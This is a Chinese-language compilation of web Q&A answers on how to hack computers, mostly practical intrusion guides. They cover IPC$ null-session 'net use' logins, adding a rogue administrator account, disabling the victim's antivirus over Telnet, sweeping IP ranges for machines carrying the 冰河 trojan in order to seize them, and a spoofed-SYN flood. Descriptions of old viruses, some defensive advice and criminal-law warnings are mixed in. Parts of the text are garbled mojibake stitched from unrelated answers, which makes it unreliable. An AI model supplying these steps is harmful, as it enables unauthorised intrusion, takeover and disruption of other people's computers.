如何攻击电脑

① 怎么用CMD进行入侵电脑

1、首先打开电脑，鼠标点击开始菜单，找到并点击运行窗口。

② 怎样入侵局域网电脑

我们在入侵的时候难免遇到忘记一些小步骤和小命令的时候，我将自己所知道的一些步骤和命令 总结 出来提供给各位。通过这些命令可以解决很大一部分新手的问题，希望对你有帮助。

入侵局域网电脑 方法 一

1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明

4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名

5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可迚入。

入侵局域网电脑方法二

1、 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”，2号软件就是着名的国产木马冰河2.2的控制端。 下载完毕并解压缩之后跟我迚行第二步!

2、 运行1号软件，首先出现的是“网络刺客II注册向导”，别理它，点击“稍后(Q)”就迚入了网络刺客II的主界面。 第三步 在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”，就迚入了“搜索因特网主机”界面。 第四步 迚入“搜索因特网主机”界面后，“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了，比如你可以选61.128或选61.200等等，“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626，其他栏保持默认不动。 好了，以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了，再检查一下填对没有?如果一切OK，请点击“开始搜索”。 第五步 观察“总迚度”和“段迚度”是否在走动。如果没有走动，那一定是IP地址设置不对，请认真检查。如果两个迚度都在走动，呵呵，你就成功一半了，至少你会使用网络刺客II扫描网上开放某一端口的计算机了。

入侵局域网电脑方法三

00:net use

作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

命令格式

net use [devicename | *] [\\computername\sharename[\volume]] [password | *]] [/user:[domainname\]username] [[/delete] | [/persistent:{yes | no}]]

参数介绍

(1)键入不带参数的net use列出网络连接。

(2)devicename指定要连接到的资源名称或要断开的设备名称。

(3)\\computername\sharename服务器及共享资源的名称。

(4)password访问共享资源的密码。

(5)*提示键入密码。

(6)/user指定进行连接的另外一个用户。

(7)domainname指定另一个域。

(8)username指定登录的用户名。

(9)/home将用户连接到其宿主目录。

(10)/delete取消指定网络连接。

(11)/persistent控制永久网络连接的使用。

01: net use \\X.X.X.X\ipc$ "" /user:"" 建立空连接

02: net use \\X.X.X.X\ipc$ "密码" /user:"用户名" 建立非空连接

03: net use \\X.X.X.X\ipc$ /del 删除连接

04: net time \\X.X.X.X

作用：使计算机的时钟与另一台计算机或域的时间同步。

命令格式：net time [\\computername | /domain[:name]] [/set]

参数介绍：

(1)\\computername要检查或同步的服务器名。

(2)/domain[:name]指定要与其时间同步的域。

(3)/set使本计算机时钟与指定计算机或域的时钟同步。

05: net view \\X.X.X.X

作用：显示域列表、计算机列表或指定计算机的共享资源列表。

命令格式：net view [\\computername | /domain[:domainname]]

参数介绍：

(1)键入不带参数的net view显示当前域的计算机列表。

(2)\\computername 指定要查看其共享资源的计算机。

(3)/domain[:domainname]指定要查看其可用计算机的域。

06: net use X: \\X.X.X.X\Y 将共享名为Y的共享资源映射为本地X盘

07: net use X: /del 删除映射的X盘

08: net share

作用：创建、删除或显示共享资源。

命令格式：net share share name=drive:path [/users:number | /unlimited] [/remark:"text"]

参数介绍：(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。 (2)sharename是共享资源的网络名称。

(3)drive:path指定共享目录的绝对路径。

(4)/users:number设置可同时访问共享资源的最大用户数。

(5)/unlimited不限制同时访问共享资源的用户数。

(6)/remark:"text "添加关于资源的注释，注释文字用引号引住。

09: net user

作用：添加或更改用户帐号或显示用户帐号信息。

该命令也可以写为 net users

命令格式：net user [username [password | *] [options]] [/domain]

参数介绍：(1)键入不带参数的net user查看计算机上的用户帐号列表。

(2)username添加、删除、更改或查看用户帐号名。

(3)password为用户帐号分配或更改密码。

(4)*提示输入密码。

(5)/domain在计算机主域的主域控制器中执行操作。

10: net start 作用：启动服务，或显示已启动服务的列表。

11: net pause 作用：暂停正在运行的服务。

12: net Continue 作用：重新激活挂起的服务。

13: net stop

注意事项：以上方法禁止使用在违法犯罪的道路上，出现任何问题本文概不负责。

入侵局域网电脑的相关 文章 ：

1. 局域网中怎么控制另一台电脑

2. 局域网入侵如何做到的

3. 怎样用局域网强制控制别人电脑

4. 怎么禁止局域网用户访问电脑的几个办法

③ 告诉我一些有名的病毒，及他们分别怎样攻击电脑

分类: 电脑/网络 >> 反病毒
解析:

一、VBS.LoveLetter@MM

这是一个Loveletter病毒家族的变种，该病毒通过下面的邮件传播：

主题：: Where are you?

消息主体： This is my pic in the beach!

附件： JENNIFERLOPEZ_NAKED.JPG.vbs

VBS.Loveletter.CN@mm还安装文件Cih_14.exe，该文件是CIH病毒的安装器，并企图运行CIH病毒。

当执行时，病毒VBS.Loveletter.CN@mm将试图完成下面的工作：

1、修改注册键中的"Timeout" 键值，这样当 诵薪铣な奔湎低巢换嵯允鞠ⅰH缓螅《舅阉魉锌捎玫那鳎檎揖哂邢铝欣┱姑奈募?

--扩展名为.vbe, , .jpeg 的文件被替换成 《镜母北尽?

--扩展名为.js, .jse, .css, .wsh, .sct, 和.hta 的文件将被 《靖北咎婊唬⑶椅募睦┱姑崽砑?vbs 。例如：原文件Filename.wsh 变成Filename.wsh.vbs.

--扩展名为.mp2 和.mp3的文件被复制，副本的扩展名中将添加.vbs的后缀，原文件被标记为隐藏。

2、创建下面的注册键：

HKEY_CURRENT_USER\Sofare\JENNIFFERLOPEZ_NAKED\Worm made in algeria

3、添加注册键值：

HKEY_LOCAL_MACHINE\Sofare\Microsoft\Windows\CurrentVersion\Run

值：WORM w exe \\JENNIFERLOPEZ_NAKED.JPG.vbs %

以便每次windows启动都运行该病毒。

4、检查注册键：

HKEY_CURRENT_USER\Sofare\JENNIFFERLOPEZ_NAKED的值是否为：mailed = 1

如果不是，则执行发送邮件功能，发送完邮件，将其值设为1。

5、蠕虫编写十六进制的文件并将其保存为\Windows\Cih_14.exe。该文件包含一个CIH病毒的安装器，之后执行该文件。一旦执行，病毒将驻留内存（win98/me），并感染PE可执行文件。

二、W32.Nimda

Worms.Nimda 是一个新型蠕虫，也是一个病毒，它通过email、共享网络资源、IIS服务器传播。同时它也是一个感染本地文件的新型病毒。

Worms.Nimda运行时，会搜索本地硬盘中的HTM和HTML文件和EXCHANGE邮箱，从中找到EMAIL地址，并向这些地址发邮件；搜索网络共享资源，并试图将带毒邮件放入别人的共享目录中；利用CodeBlue病毒的方法，攻击随机的IP地址，如果是IIS服务器，并未安装补丁，就会中毒。该蠕虫用它自己的的SMTP服务器去发出邮件。同时用已经配置好的DNS获得一个mail服务器的地局胡址。

Worms.Nimda运行物腊稿时，会查找本地的HTM/ASP文件，将生成的带毒邮件放入这些文件中，并加入java 疟尽U庋康备猛潮淮蚩保突嶙远蚩萌径镜膔eadme.eml。

Worms.Nimda感染本地PE文件时，有两种方法，一种是查找所械腤INDOWS 应用程序(在HKEY_LOCAL_MACHINE/Sofare/Microsoft/Windows/Currentversion/App Paths中)，并试图感染之，但不感染WINZIP32.EXE；第二种方法搜索所有文件，并试图感染之。被感染的文件会增大约57KB。

如果用户游览了一个已经被感染的web 页时，就会被提示下载一个.eml(Outlook Express)的电子邮件文件，该邮件的MIME头是一个非正常的MIME头，并且它包含一个附件，即此蠕虫。这种邮件也可能是别人通过网络共享存入你的计算机中，罩孝也可能是在别人的共享目录中，无论如何，只要你在WINDOWS的资源管理器中选中该文件，WINDOWS将自动预览该文件，由于Outlook Express的一个漏洞，导致蠕虫自动运行，因此即使你不打开文件，也可能中毒，相关信息请参见微软安全网站：microsoft/tech/security/bulletin/MS01-020，同时，该漏洞已有安全补丁：microsoft/windows/ie/downloads/critical/q290108/default。

当这个蠕虫执行的时候，它会在WINDOWS目录下生成MMC.EXE文件，并将其属性改为系统、隐藏；它会用自己覆盖SYSTEM目录下的RICHED20.DLL，这个文件是OFFICE套件运行的必备库，WINDOWS的写字板等也要用到这个动态库，任何要使用这个动态库的程序试图启动时，都会激活该它；它会将自己复制到SYSTEM目录下，并改名为LOAD.EXE，同时将SYSTEM.INI文件中的SHELL项改为“explorer．exe load．exe － dontrunold”，这样，在系统每次启动时，将自动运行它；这个蠕虫会在已经感染的计算机共享所有本地硬盘，同时，这个蠕虫会以超级管理员的权限建立一个guest的访问帐号，以允许别人进入本地的系统。这个蠕虫改变Explorer的设置这样就让它无法显示隐藏文件和已知文件的扩展名

三、W32.Elkern.cav.c

W32.ElKern.3326感染共享文件、映像驱动器，同时该病毒还会感染本机硬盘的\Windows\System目录中的文件。

如果病毒是在Windows NT/2000系统中被激活，当第一次被激活后，病毒变会蹦溃。

如果病毒在Windows 9x系统中被激活并且本机有带写保护的网络映像，很短的时间后，病毒将使机器当掉。

病毒感染文件后，文件的大小并不改变。

W32.ElKern.3326在感染文件时可能是空的感染源也可能是“添加器”，这就意味着，如果可能，病毒将拒绝将自身代码添加到宿主文件内，免得文件的尺寸变大。

一旦病毒被激活，它将创建一个自身的可执行文件后，直接控制对宿主文件。

在\Windows\System目录中创建自身的副本，文件名依不同的系统而不同：

1）Windows 95/98/Me： %System%\Wqk.exe

2）Windows NT/2000： %System%\Wqk.dll

根据不同的操作系统，W32.ElKern.3326创建不同的不同的注册键：

1）Windows 95/98/Me

HKEY_LOCAL_MACHINE\Sofare\Microsoft\Windows\CurrentVersion\Run

值：WQK %System%\Wqk.exe

2）HKEY_LOCAL_MACHINE\Sofare\Microsoft\Windows NT\CurrentVersion\Windows

值：AppInit_DLLs %System%\Wqk.dll

eeen each file that it tries to infect.

四、VBS.Redlof@M

1.此病毒属于脚本类病毒,此病毒感染脚本类型的文件。

2.此病毒运行时，全盘查找脚本类型的文件{vbs,, 等),如果找到，则将病毒自身加入这些文件的尾部，完成感染。

3.此病毒感染目录时，还会在一些目录下产生两个文件，一个名为：desktop.ini的目录配置文件，一个名为：folder.htt的病毒体文件。

五、W32.Klez

该病毒基本分为两部分：一部分是狭义上的病毒，它感染PE结构文件，病毒大小约为3K，用汇编语言编写；第二部分是蠕虫大小为56K，它在运行中会释放并运行一个11722字节的带毒的PE文件。第二部分是用VC++编写的，它只可以在WINDOWS 9X或WINDOWS2000上运行，在NT4上无法运行。

它的传播方式有四种：

第一种：通过INTERNET邮件，它搜索当前用户的地址簿文件中的类邮件地址的文本内容，或随机计算邮件地址，通过WINDOWS的SOCKET函数集用SMTP服务器发送自己这个带毒木马，邮件文件是由木马部分形成，并且该邮件会在OUTLOOK EXPRESS下自动执行，它的主题是随机的，但以下几种情况：

Hi

Hello

How are you?

Can you help me?

We want peace.

Where will you go?

Congratulations!!!

Don't cry.

Look at the pretty.

Some advice on your shorting.

Free XXX Pictures.

A free hot *** site.

Why don't reply to me?

How about have dinner with me together?

信的正文为：

I'm sorry to do so,but it's helpless to say sorry.

I want a good job,I must support my parents.

Now you have seen my technical capabilities.

How much my year-salary now? NO more than $5,500.

What do you think of this fact?..Don't call my names,I have no hostility.

Can you help me?

第二种：通过网络邻居，它搜索所有的网络连接，查找共享目录，将自己的文件放到享目录中，并试图让远程计算机将它作为一个服务启动。

第三种：通过磁盘传播，它创建专门的线程感染磁盘，如果当前日期奇数月的13号，将找到的文件内容进行复制。

第四种：方式病毒感染。

病毒部分的运行过程：

1、解密后面的代码长度258H字节

2、然后病毒在内存中查找KERNEL32模块，并根据名字的检验字找到一大批函数入口，这些函数供后面的代码调用。

3、申请内存，将所有代码拷贝到申请的内存中，并转申请的内存执行。

4、查检有无调试程序（调IsDebugPresent函数），如在调试程序下运行，终止病毒代码，返回到原宿主程序（如果是配套的木马，则返回到操作系统）。

5、启动感染代码，如未在调试程序下运行，在SYSTEM（由GetSystemDirectory）目录感染或建立WQK.EXE(WIN9X下)或WQK.DLL(NT下)。

6、将当前进程注册为服务进程。

7、创建感染线程，根据系统时间，如果为13号且为3月或9月，感染所有硬盘或网络盘文件。否则感染系统目录。某些条件下创始的感染线程会启动另一个感染线程，直到系统崩溃。

8、如果是NT操作系统，同时感染所有网络邻居。

9、返回宿主或操作系统。

木马部分运行过程：

1、解码所有字符串。

2、改变当前进程访问权限。

3、启动线程1，线程1的作用如下：

检查当前所有进程，如果有以下进程（部分匹配），则终止这些进程：

_AVP32, _AVPCC, _AVPPM, ALERTSVC,AMON

AVP32,AVPCC,AVPM,N32SCANW,NAVAPSVC,

NAVAPW32,NAVLU32,NAVRUNR,NAVW32,NAVWNT,

NDD32,NPSSVC,NRESQ32,NSCHED32,NSCHEDNT,

NSPLUGIN,SCAN,SMSS

如果是WINDOWS9X系统，将当前程序设为自启动（Sofare\Microsoft\Windows\CurrentVersion\Run）线程永不终止。

4、启动线程2，作用如下：

复制自己，运行后删除，然后线程终止。

5、在系统目录中创建KRNL32.EXE，如果是9X，运行它，并将它放入 Sofare\Microsoft\Windows\CurrentVersion\Run 中自动运行。如果是2000系统，

将它作为Service启动。

6、创建线程3，发送EMAIL。

创建线程4，感染网络所有共享文件，每8小时搜索一次。

创建线程5，搜索磁盘文件。

创建线程6，检查当前日期是否为奇数月的13号，如是，将所有文件复制一次，线程5小时运行一次，永不退出。

六、W32.Nimda.eml

感染途径：

该病毒是一种传染途径很多的病毒，并且尝试利用多种已知系统漏洞，于第一版相似，它通过以下途径感染

l 电子邮件（附件）

l 局域网共享驱动器

l 利用没有安装Service Pack的IIS(Inter Information Server)

l 通过文件感染

利用了如下的系统漏洞：

l MIME漏洞，可以在没有得到用户许可的情况下自动执行附件

l IIS漏洞，使之可以被上载恶意代码与前版本的不同：

Win32.Nimda.E是Nimda.A的新变种，它修改了以前版本的一些错误，并且加入了对付多种对抗反病毒软件的设计，它与第一版的主要区别有：

l 附件名改名为Sample.exe

l 复制本身到系统目录下的名称改为Csrss.exe（原来为mmc.exe）

l 释放出的动态库名称变更为Httpodbc.dll

建议用户做如下系统升级，以便防患于未然：

升级到Inter Explorer 5.01 SP2 或

升级到Inter Explorer 5.5 SP2 或

升级到Inter Explorer 6.0

下载并安装升级包，NT4用户使用NT4 Service Pack 6a，Windows 2000用户使用 Windows 2000 Service Pack 2，并且到微软公司的主页（或用Windows Update）下载安全补丁。

注意磁盘共享的权限、口令设置，不要让所有用户对硬盘驱动器都可以读写不要打开来历不明的邮件附件，尤其是可执行文件。

七、W32.Klez.eml

新的Klez变种在以前的基础上增加了更多的工作线程，并且在驻留系统后可能会结束其它进程并且删除相应文件，所以有较大的破坏，提请用户注意！

蠕虫的流程：

1.蠕虫使用AdjustTokenPrivileges调整自己的特权，

2.拷贝自己的一个副本到系统目录下，名为win****.exe.

3.修改注册表，向SCM数据库中添加新的服务。

4.复制自己并运行，然后删除。

5.调用StartServiceCtrlDispatcher函数。

6.服务创建下面的线程。

7.结束。

第一个线程：

写注册表

遍历系统进程，结束正在运行的进程并删除进程的磁盘文件。

第二个线程：

发email.

第三个线程：

遍历本地网络。

第四个线程：

注册表操作

第六个线程：

搜索特定目录

第七个线程：

搜本地磁盘。

第八个线程：

搜索磁盘文。

第五个线程：

复制自己，运行后删除。

信件主题可能为以下内容：

Hi,

Hello,

Re:

Fw:

Undeliverable mail--"..."

Return

how are you

Let's be friends

Darling

Don't drink too much

your password

Honey

Some questions

Please try again

wele to my hometown

The Garden of Eden

Introction on ADSL

Meeting notice

questionnaire

Congratulations

Sos!

Japanese girl VS playboy

Look,my beautiful girl friend

Eager to see you

spice girls' vocal concert

Japanese lass' sexy pictures

信件携带的附件虚假扩展名可能为以下之一：

txt wab doc xls cpp c pas mpg mpeg bak mp3

真实扩展名为EXE SCR PIF BAT之一。

病毒体内有以下加密信息：

Win32 Klez V2.0 & Win32 Elkern V1.1,(There nick name is Twin Virus*^__^*)

Copyright,made in Asia,announcement:

1.I will try my best to protect the user from some vicious virus,Funlove,Sircam,Nimda,CodeRed and even include 32.Klez1.X

2.Pitiful AVers,can't Elkern 1.0 & 1.1 work on Win 2K&XP?Plz clear your eyes.

3.Well paid jobs are wanted

4.Poor life should be unblessed

5.Don't accuse me.Please accuse the unfair shit world

解决方法，本病毒无法手工杀毒，只能升级杀毒软件。并且由于会结束进程，所以建议用户在DOS下用杀毒软件清除。

八、Script.Exploit

1.此病毒利用脚本的SCAPE功能将自身加密,以达到隐藏自己的目的.

2.此病毒利用”万花谷病毒”的技术来破坏系统的正常使用.

3.将IE的首页通过系统注册表项

HKEY_LOCAL_CURRENT_USER\\Sofare\\Microsoft\\Inter Explorer\\Main\\Start Page",设置成为:” hunk.love.you/'>[url=hunk.love.you/]hunk.love.you/”

4.为了达到破坏性，该病毒对系统的注册表做了如下的修改：

1.通过系统注册表项HKCU\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun的修改使系统没有”运行”菜单。

2.通过系统注册表项HKCU\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose的修改使系统没有” 关闭系统”项目.

3.通过系统注册表项HKCU\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff的修改使系统没有”注销”项目.

4.通过系统注册表项HKCU\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives的修改使系统没有所有的逻辑驱动器.

5.通过系统注册表项HKCU\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools的修改使系统不能使用注册表的编辑工具REGEDIT.

6.通过系统注册表项HKCU\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop的修改使系统没有桌面.

7.通过系统注册表项HKCU\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled的修改使系统禁止运行所有的DOS应用程序.

8.通过系统注册表项HKCU\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled的修改使系统不能启动到"实模式（传统的DOS模式）"下.

9.通过系统注册表项"HKLM\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption的修改使系统登录时显示一个登录窗口,此窗口的标题为:” HUNK提醒您中了※混客绝情炸弹※QQ:5604160”.

10.通过系统注册表项HKLM\\Sofare\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText的修改使系统登录时显示一个登录窗口,此窗口内的文字为:” HUNK提醒您中了※混客绝情炸弹※QQ:5604160”.

11.通过系统注册表项HKLM\\Sofare\\Microsoft\\Inter Explorer\\Main\\Window Title的修改使系统在打开所有的IE窗口时, 窗口的标题为:” HUNK提醒您中了※混客绝情炸弹※QQ:5604160”.

九、W32.FunLove.gen

这是WIN32类型的病毒，它可以感染Windows 9x 和Windows NT 4.0操作系统。它感染所有WIN32类型的文件（PE文件），如Windows 和 Program Files 目录及其子目录中的扩展名为.EXE, .SCR, and .OCX 的文件。该病毒搜索所有具有写访问的网络共享文件夹并感染那里的所有的文件。该病毒同时能够修补NT环境的完整性检测，以便能够感染系统文件。

病毒中有'~Fun Loving Criminal~'字样。 该病毒没有故意的破坏性，但是由于NT系统安全性很差而可能造成的破坏还是应当引起注意的。

同一个简单的添加一样，Win32/Funlove.4099将它的代码复制到宿主文件的最后一个扇区的结尾，然后，它修改PE文件头信息以显示新的扇区大小，使扇区的特征适应病毒的需要，同时病毒修改原文件入口点的程序代码以便执行病毒代码。

当一个染毒程序被运行，病毒代码程序获得系统控制权，Win32/Funlove.4099 病毒在系统目录下创建FLCSS.EXE文件，并从染毒宿主文件的最后提取出病毒代码，将其写入该文件中，然后FLCSS.EXE被执行。

如果是在NT的许可权限下运行，FLCSS.EXE会将自身像一个服务程序一样安装到NT机器上。它会以"FLC"显示在标准的NT服务列表中，并且被设置为在每次启动时自动运行此服务。在Windows 9X下，它像一个隐含程序一样运行，在任务列表中是不可见的。

在病毒程序第一次运行时，该病毒会按照一定的时间间隔，周期性地检测每一个驱动器上的EXE，SCR（屏保程序）和OCX（ActiveX control）文件，找到相应的文件就感染它们。它还搜索在网络上可使用的共享资源，并感染任何有访问权限的同一类型的文件。因此，它可以在机器间完全开放权限的共享文件上非常快地传播。该病毒检测以下文件名且不感染它们：ALER*, AMON*, _AVP*, AVP3*, AVPM*, F-PR*, NAVW*, SCAN*, SMSS*, DDHE*, DPLA*, MPLA*。

尽管该病毒对数据没有直接的破坏性，但是在NT下，Win32/Funlove.4099 病毒还是对NTOSKRNL.EXE 文件做了一个小的修改（patch），使得文件的许可请求总是返回允许访问（access allowed），这意味着被感染机器的安全已受到了极大地威胁。只要是在被修改的机器上，所有的用户都拥有了对每一个文件的完全控制访问权，即使是在系统中可能拥有最低权限的GUEST，也能读取或修改所有文件，包括通常只有管理员才能访问的文件。在NT启动时，NTLDR将检测NTOSKRNL.EXE 的完整性，所以病毒也修改NTLDR，因此NTLDR将允许系统加载修改后的NTOSKRNL文件。这种修改只能在某些NT服务包（service packs）中起作用，但是不管当前机器的SP级别病毒都会申请修改程序。在感染FLC病毒的NT机器上清除病毒后，需要用备份文件对这些被修改的文件进行恢复，或者重新安装这些文件。

如果FLCSS.EXE 运行在DOS下，病毒将显示'~Fun Loving Criminal~'字串，然后它试图通过键盘控制器重新启动系统。这大概是希望Windows被加载且病毒可能有另一个机会去执行。这种尝试经常失败，而计算机则被锁。

十、W95.Spaces.gen

这是一个危险的常驻内存寄生病毒。它只在WIN95/98下进行复制，而且会感染WIN32可执行文件。当一个受染文件运行的时候，病毒会自我安装到WINDOWS内存中。在感染的时候，病毒会增加文件最后区的空间病把自己写到这里。

在七月一日，病毒会破坏硬盘的MBR区病毒终止机器的运行。它会删除MBR载入程序的代码并修改磁盘的分区表格，这样只有一个区间被列出，然后指到MBR区。这种方式的破坏很危险：在DOS装载的时候会被终止。虽然磁盘上的数据没有被破坏，但是这个磁盘区不能被再次访问了。病毒能绕过BIOS防病毒保护程序把自己直接写到硬盘控制器的端口，这样就破坏了MBR区间。由于病毒程序存在缺陷，因此会产生"General Protection Fault"出错信息，这样MBR就会免于受到破坏。

注意：如果在一个文件的最后部分发现字符串ERL，这就能证明此病毒已经感染了这个文件。

④ 如何黑进别人的电脑

问题一：如何黑入他人电脑（通过ip） 首先要确定要入侵电脑的IP，关于IP，网吧的编号和IP地址通常是相同或高一位，比如编号为 20的电脑，IP一般是192.168.0.20或192.168.0.21… 大家要是上贴吧匿名发帖子的话，也会 看见IP地址… 有了IP地址后，就可以连接那将被你入侵的倒霉电脑了，一般登陆电脑的用户名多是“user编号” 的形式空密码形式，所以在“命令提示符”下输入net use IP地址/ipc$/user:及 net use IP地址/ipc$/user:user编号命令进行连接 连接成功后必须关闭对方电脑的杀毒软件，右击“我的电脑”，选择“管理”在弹出窗口中右击 “计算机管理（本地）”，选择“连接另一台计算机”，连接至那台倒霉电脑的IP号，启动 “Tenlet”服务 然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。 net user user编号/add net localgroup administators user编号/add 然后进入C:\Winnt\System32,右击CMD.EXE，选择“创建快捷方式”，然后右击快捷方式，选择 “属性”，选择“以其他用户身份运行”，运行快捷方式CMD，弹出“以槐档橡其他用户身份运行”窗 口后，输入“user编号”回车 用telnet 电脑IP编号 登陆至那个倒霉孩子的电脑，再从网上下载一个命令行下杀进程的软件， 比如说knlps等，在telnet上将杀毒软件进程关闭。

问题二：怎么进入别人的计算机 黑客技术 怎么黑进别人的电脑 步骤：1、首先要获得对方的IP地址。2、接着用端口扫描器判断对方开放了那些端口，分析对方使用的操作系统。3、接下铅旁来就是寻找可用的有漏洞的端口，通过漏洞端口连接对方的电脑。4、然后将更具破坏性的木马或诱探程序，通过漏洞传输到对方电脑。5、最后就是通过传输的破坏程序，给对方电脑搞出更大的漏洞(也就是先开一个小门进去，然后再扩大这扇门)，这时就该想办法完全控制对方的电脑。

问题三：怎样用IP黑别人电脑

问题四：怎么进入别人的计算机 黑客技术 怎么黑进别人的电脑 不是你想的那么简单！就算详细回答了你也看不懂！先去学习下基础知识吧！

问题五：如何通过网络进入别人的电脑 如何一步一步进入别人计算机!
跟着TTY一步一步走进对方计算机:
这道快餐是专门为从来没有通过网蠢冲络进入过对方计算机的网络新手们准备的，主要使用的软件就是着名的国产木马冰河2.2，所以，如果你已经使用过冰河2.2，就不必跟着我们往下走了。其他有兴趣的网络新手们，Let's go！
第一步 下载网络新手快餐软件包 tty.zip到网络休闲庄（atty.126）“红客软件”->>“中文软件”里下载网络新手快餐软件包，文件名是：tty.zip。该软件包里准备了本次实验所需的所有软件，大小811K。解开tty.zip，里面应有1号、2号、两个软件，是为了叙述方便而编的号，1号软件就是端口扫描工具“网络刺客II”，2号软件就是着名的国产木马冰河2.2的控制端。下载完毕并解压缩之后跟我进行第二步！
第二步
运行1号软件，首先出现的是“网络刺客II注册向导”，别理它，点击“稍后(Q)”就进入了网络刺客II的主界面。
第三步 在网络刺客II的主界面里选“工具箱（U）”-》“主机查找器（H）”，就进入了“搜索因特网主机”界面。
第四步 进入“搜索因特网主机”界面后，“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了，比如你可以选61.128或选61.200等等，“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626，其他栏保持默认不动。好了，以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了，再检查一下填对没有？如果一切OK，请点击“开始搜索”。
第五步 观察“总进度”和“段进度”是否在走动。如果没有走动，那一定是IP地址设置不对，请认真检查。如果两个进度都在走动，呵呵，你就成功一半了，至少你会使用网络刺客II扫描网上开放某一端口的计算机了。下面你要作的就是静静的等待，学用黑客软件是需要耐心的。大约20-30分钟后，最下面的记录栏里就应该出现记录了（一般情况下，应该有5、6条记录）。每一条记录代表找到的中了冰河木马的一台计算机，前面是该计算机的IP地址，后面是7626（冰河木马端口）。
第六步 点击“停止搜索”，但不要退出程序，到第十二步时还要用。运行2号软件冰河，进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。
第七步 在“添加主机”窗口，“显示名称”里填入第五步里搜索到的第一条IP地址，当IP地址填入“显示名称”里后，“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。好了，检查一下IP有没有填错，如果OK，点击“确定”，在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步 这一步和下一步最重要，请认真看清楚！在冰河的主界面里，点击“文件管理器”里的“我的电脑”，这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如，如果你的硬盘分的是四个区，“文件管理器”右边的框里就会从上往下依次出现C：、D：、E：、F：，如果你的硬盘分的是两个区，就会出现C：、D：。
第九步 点击“文件管理器”里刚才输入的第一条IP地址，稍等片刻（网速慢的情况下约10-30秒），在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗？看......>>

问题六：黑客到底是怎么黑进别人的电脑的 windows比较麻烦，linux操作系统操作起来简单些。
比如就用windows进行最简单的DoS攻击吧。
1.由于windows不允许更改底层网络数据包（linux可以改），因此先要链接winpcap环境。
2.在winpcap的保护下，对数据包进行修改，针对TCP segment，包含于IP datagram
3.将TCP segment，SYN设为1，ACK设为0，一定要把sender改成一个不存在的地址！这是DoS攻击的精髓。
4.然后不停的发吧，把某某IP客户端发到瘫痪为止 呵呵。
5.高级点的话诸如shellcode，到客户端内运行，夺取系统Sid，得到管理员操作权，再想办法把帐户隐藏，呵呵，随心所欲吧。。。

问题七：怎么才能黑进别人的电脑 不是你想的那么简单！就算详细回答了你也看不懂！先去学习下基础知识吧！

问题八：怎么才能黑进别人的电脑 有专门的企鹅群的 不过需要技术的 还有黑人家的电脑是违法的 你要考虑下后果的 在群里可以要到一些木马的

问题九：怎么黑进别人的电脑的相关视频 入侵他人计算机属于刑事犯罪，所以侵入别人的电脑，开启对方摄像头是犯罪行为,请勿尝试学习或攻击。
我国《刑法》中有关计算机犯罪的规定：
1、
《刑法》第285条规定的“非法侵入计算机信息系统罪”，该罪是指违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的行为。本罪
所侵犯的客体是国家重要计算机信息系统的安全，犯罪对象是国家事务、国防建设、尖端科学技术领域的计算机信息系统。客观方面表现为违反国家规定，侵入上述
三类计算机信息系统的行为。而主观方面只能是故意，即明知是该类系统而故意侵入。触犯本罪处三年以下有期徒刑或者拘役。
2、《刑法》第286条规定的“破坏计算机信息系统罪”是指违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常
运行，或者对计算机信息系统中存储、处理或传输的数据和应用程序进行删除、修改、增加的操作，或者故意制作、传播计算机病毒等破坏性程序，影响计算机系统
正常运行，后果严重的行为。本罪所侵犯的客体是国家对计算机信息系统的管理制度。客观方面表现为行为人违反国家规定，破坏计算机信息系统，且后果严重的行
为。主观方面只能是故意。触犯该罪的，处五年以下有期徒刑或者拘役，后果特别严重的，处五年以上有期徒刑。

